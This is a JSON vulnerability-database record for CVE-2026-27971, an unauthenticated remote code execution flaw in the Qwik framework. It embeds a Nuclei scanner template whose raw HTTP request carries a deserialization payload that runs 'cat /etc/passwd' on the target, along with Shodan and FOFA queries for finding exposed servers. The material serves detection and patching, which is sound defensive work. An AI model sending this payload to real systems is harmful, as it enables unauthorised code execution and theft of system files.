{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-27971/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-27971/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-27971/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-27971/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-27971/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-27971"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-27971"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2026/CVE-2026-27971.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2026-27971\n\ninfo:\n  name: Qwik - Unauthenticated RCE via server$ Deserialization\n  author: omarkurt\n  severity: critical\n  description: |\n    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.\n  remediation: |\n    Update to version 1.19.1 or later.\n  reference:\n    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm\n    - https://vulnerabletarget.com/VT-2026-27971\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 9.2\n    cve-id: CVE-2026-27971\n    epss-score: 0.05416\n    epss-percentile: 0.92349\n    cwe-id: CWE-502\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.html:\"q:version\"\n    fofa-query: body=\"q:version\"\n  tags: cve,cve2026,qwik,rce,deserialization,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /?qfunc=sync HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/qwik-json\n        X-QRL: sync\n        Origin: {{RootURL}}\n\n        {\"_objs\":[\"\\u0002./node_modules/cross-spawn/index#sync\",\"cat\",\"/etc/passwd\",[\"2\"],[\"0\",\"1\",\"3\"]],\"_entry\":\"4\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('root:.*:0:0:', body)\"\n          - \"status_code == 200\"\n          - \"contains(header, 'application/qwik-json')\"\n        condition: and\n# digest: 4a0a00473045022100d1757f7c69bc4b959b3a8fc5e3aba641ca85a913a096be052210138cb9ba052a022073c58b94568c7713920ca08ad1868996d689ddea892e29f1740864b48de57d59:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2026-27971"
}